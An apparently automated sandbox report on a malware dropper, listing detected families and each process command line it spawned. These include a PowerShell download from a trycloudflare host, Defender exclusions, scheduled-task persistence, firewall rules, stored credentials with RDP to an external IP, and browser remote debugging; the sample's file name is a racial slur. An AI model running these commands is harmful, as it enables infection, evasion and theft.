Malware Analysis Report

2025-01-23 11:50

Sample ID: 241202-bpbmbsxjfq
Target: niggers.exe
SHA256: c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Tags: pyinstaller ammyyadmin asyncrat flawedammyy lumma metasploit njrat quasar ramnit redline rhadamanthys vidar xmrig xworm af458cf23e4b27326a35871876cc63d9 default diamotrix mohib office04 sgvp aspackv2 backdoor banker credential_access defense_evasion discovery evasion execution infostealer miner privilege_escalation rat spyware stealer trojan upx worm
Score: 10/10


Analysis Overview

Threat Level: Known bad

The file niggers.exe was found to be: Known bad.

Malicious Activity Summary

Rhadamanthys family

Quasar RAT

njRAT/Bladabindi

Rhadamanthys

Flawedammyy family

Xworm family

Lumma family

Njrat family

Vidar

AsyncRat

Xworm

Xmrig family

Ammyy Admin

Quasar payload

MetaSploit

xmrig

AmmyyAdmin payload

Redline family

Asyncrat family

Vidar family

RedLine

Ammyyadmin family

Lumma Stealer, LummaC

Ramnit

Detect Vidar Stealer

FlawedAmmyy RAT

RedLine payload

Detect Xworm Payload

Quasar family

Ramnit family

Metasploit family

Async RAT payload

XMRig Miner payload

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

ASPack v2.12-2.42

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Program crash

Embeds OpenSSL

System Location Discovery: System Language Discovery

Detects Pyinstaller

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

NSIS installer

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Views/modifies file attributes

Runs net.exe

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious use of WriteProcessMemory

GoLang User-Agent

Analysis: static1

Detonation Overview

Reported

2024-12-02 01:18

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-02 01:18

Reported

2024-12-02 01:21

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI30642\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-02 01:18

Reported

2024-12-02 01:21

Platform

win10v2004-20241007-en

Max time kernel

122s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Ramnit

trojan spyware stealer worm banker ramnit

Ramnit family

ramnit

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Rhadamanthys

stealer rhadamanthys

Rhadamanthys family

rhadamanthys

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4440 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 2672 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 2672 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 2672 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
PID 2672 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\System32\notepad.exe
PID 2672 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 3240 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3240 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2028 wrote to memory of 2628 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2672 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 3240 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\241.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\saw.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\b.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe

"C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://varied-flux-emails-grounds.trycloudflare.com/a.pdf

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8e3a446f8,0x7ff8e3a44708,0x7ff8e3a44718

C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe

"C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://varied-flux-emails-grounds.trycloudflare.com/qfv0ao.zip' -OutFile 'C:\Users\Admin\Downloads\qfv0ao.zip' }"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"

C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

"C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3144 -ip 3144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1012

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\langla.exe

"C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3684 -ip 3684

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3684 -ip 3684

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 1384

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3852 -ip 3852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 536

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Users\Admin\Downloads\UrlHausFiles\me.exe

"C:\Users\Admin\Downloads\UrlHausFiles\me.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CEBA.tmp\CEBB.tmp\CEBC.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\..\360Downloads\Pester.bat

C:\Users\Admin\Downloads\UrlHausFiles\RuntimeBroker.exe

"C:\Users\Admin\Downloads\UrlHausFiles\RuntimeBroker.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ff8dd80cc40,0x7ff8dd80cc4c,0x7ff8dd80cc58

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,10159024487572961583,16661247225601745770,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1916 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2064,i,10159024487572961583,16661247225601745770,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2072 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,10159024487572961583,16661247225601745770,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2252 /prefetch:8

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Users\Admin\Downloads\UrlHausFiles\EbjU3lW.exe

"C:\Users\Admin\Downloads\UrlHausFiles\EbjU3lW.exe"

C:\Windows\system32\cmdkey.exe

cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"

C:\Windows\SysWOW64\PING.EXE

ping -n 4 127.0.0.1

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Windows\system32\mstsc.exe

mstsc /v: 211.168.94.177

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp15D5.tmp.bat""

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8da0246f8,0x7ff8da024708,0x7ff8da024718

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'

C:\Users\Admin\Downloads\UrlHausFiles\build.exe

"C:\Users\Admin\Downloads\UrlHausFiles\build.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Update.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Update.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\240D.tmp\240E.tmp\240F.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\DK.exe

"C:\Users\Admin\Downloads\UrlHausFiles\DK.exe"

C:\Windows\system32\cmd.exe

